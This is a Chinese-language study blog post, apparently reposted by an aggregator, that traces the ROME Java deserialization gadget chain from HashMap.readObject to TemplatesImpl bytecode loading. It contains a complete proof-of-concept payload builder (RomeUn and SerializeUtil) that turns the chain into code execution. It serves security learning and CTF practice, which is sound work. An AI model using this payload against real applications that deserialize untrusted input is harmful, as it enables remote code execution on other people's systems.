[Java反序列化]rome反序列化学习

Posted bfengj

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java反序列化]rome反序列化学习相关的知识,希望对你有一定的参考价值。

前言

也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome的反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。

分析

从网上找了利用链:

TemplatesImpl.getOutputProperties()
NativeMethodAccessorImpl.invoke0(Method, Object, Object[])
NativeMethodAccessorImpl.invoke(Object, Object[])
DelegatingMethodAccessorImpl.invoke(Object, Object[])
Method.invoke(Object, Object...)
ToStringBean.toString(String)
ToStringBean.toString()
ObjectBean.toString()
EqualsBean.beanHashCode()
ObjectBean.hashCode()

HashMap<K,V>.hash(Object)
HashMap<K,V>.readObject(ObjectInputStream)

跟着看一下吧,HashMap那里肯定就是为了调用hashCode,直接跟进ObjectBeanhashCode

    public int hashCode() 
        return _equalsBean.beanHashCode();
    

跟进beanHashCode()

    public int beanHashCode() 
        return _obj.toString().hashCode();
    

调用了_objtoString(),这也是继BadAttributeValueExpException之后的又一个利用toString()触发调用链的。

还需要看一下ObjectBean中的_toStringBean属性,它的类是ToStringBean,当调用ObjectBean对象的toString时,实际上是调用ToStringBean对象的toString

    public String toString() 
        Stack stack = (Stack) PREFIX_TL.get();
        String[] tsInfo = (String[]) ((stack.isEmpty()) ? null : stack.peek());
        String prefix;
        if (tsInfo==null) 
            String className = _obj.getClass().getName();
            prefix = className.substring(className.lastIndexOf(".")+1);
        
        else 
            prefix = tsInfo[0];
            tsInfo[1] = prefix;
        
        return toString(prefix);
    

截取个prefix,然后继续跟进带参数的toString(prefix)

    private String toString(String prefix) 
        StringBuffer sb = new StringBuffer(128);
        try 
            PropertyDescriptor[] pds = BeanIntrospector.getPropertyDescriptors(_beanClass);
            if (pds!=null) 
                for (int i=0;i<pds.length;i++) 
                    String pName = pds[i].getName();
                    Method pReadMethod = pds[i].getReadMethod();
                    if (pReadMethod!=null &&                             // ensure it has a getter method
                        pReadMethod.getDeclaringClass()!=Object.class && // filter Object.class getter methods
                        pReadMethod.getParameterTypes().length==0)      // filter getter methods that take parameters
                        Object value = pReadMethod.invoke(_obj,NO_PARAMS);
                        printProperty(sb,prefix+"."+pName,value);
                    
                
            
        
        catch (Exception ex) 
            sb.append("\\n\\nEXCEPTION: Could not complete "+_obj.getClass()+".toString(): "+ex.getMessage()+"\\n");
        
        return sb.toString();
    

关键就是BeanIntrospector.getPropertyDescriptors(_beanClass);这行代码,它获取类的属性的getter和setter,稍微跟进去看看一些处理就知道了:

    private static PropertyDescriptor[] getPDs(Class klass) throws IntrospectionException 
        Method[] methods = klass.getMethods();
        Map getters = getPDs(methods,false);
        Map setters = getPDs(methods,true);
        List pds     = merge(getters,setters);
        PropertyDescriptor[] array = new PropertyDescriptor[pds.size()];
        pds.toArray(array);
        return array;
    

之后下面的调用都懂了:

                    Method pReadMethod = pds[i].getReadMethod();
                    if (pReadMethod!=null &&                             // ensure it has a getter method
                        pReadMethod.getDeclaringClass()!=Object.class && // filter Object.class getter methods
                        pReadMethod.getParameterTypes().length==0)      // filter getter methods that take parameters
                        Object value = pReadMethod.invoke(_obj,NO_PARAMS);

获取对应的Method,如果它是无参的就调用了。

所以rome链的后面这部分利用其实就类似于CommonsBeanutils的链了,调用TemplatesImplgetOutputProperties进行动态加载字节码来实现命令执行。

所以直接尝试构造POC就可以了,比较简单:

package com.summer.rome;

import com.summer.util.SerializeUtil;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.util.HashMap;

public class RomeUn 
    public static void main(String[] args) throws Exception
        byte[] evilCode = SerializeUtil.getEvilCode();
        TemplatesImpl templates = new TemplatesImpl();
        SerializeUtil.setFieldValue(templates,"_bytecodes",new byte[][]evilCode);
        SerializeUtil.setFieldValue(templates,"_name","feng");
        SerializeUtil.setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);

        ObjectBean objectBean = new ObjectBean(String.class,"feng");


        HashMap evilMap = new HashMap();
        evilMap.put(objectBean,1);
        evilMap.put(objectBean,1);
        
        SerializeUtil.setFieldValue(objectBean,"_equalsBean",equalsBean);


        byte[] bytes = SerializeUtil.serialize(evilMap);
        SerializeUtil.unserialize(bytes);
    


package com.summer.util;

import javassist.ClassPool;
import javassist.CtClass;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class SerializeUtil 
    public static Object getFieldValue(Object obj, String fieldName) throws Exception
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        return field.get(obj);
    
    public static byte[] getEvilCode() throws Exception
        ClassPool pool = ClassPool.getDefault();
        CtClass clazzz = pool.get("EvilTest");
        byte[] code = clazzz.toBytecode();
        return code;
    

    public static void unserialize(byte[] bytes) throws Exception
        try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
            ObjectInputStream oin = new ObjectInputStream(bain))
            oin.readObject();
        
    

    public static byte[] serialize(Object o) throws Exception
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout))
            oout.writeObject(o);
            return baout.toByteArray();
        
    
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    


网上的链子似乎有个多余的点,它调用_objtoString调用的是ObjectBeantoString来触发,没有这个必要,直接触发ToStringBeantoString即可。

同样的,为了防止put的时候触发反序列化,先放进去无害的,put完之后再利用反射来修改_equalsBean为恶意的。

总结

好久没看Java的反序列化了,一开始看起来去回忆之前的内容也花了一些时间,稍微把动态加载字节码还有CommonsBeanutils给回忆起来就会发现这条链子非常简单了。

以上是关于[Java反序列化]rome反序列化学习的主要内容,如果未能解决你的问题,请参考以下文章

dubbo provider 反序列化rce及补丁绕过

[Java反序列化]Shiro反序列化学习

[Java反序列化]Shiro反序列化学习

初探Java反序列化漏洞学习笔记

[Java反序列化]Shiro反序列化学习

[Java反序列化]Shiro反序列化学习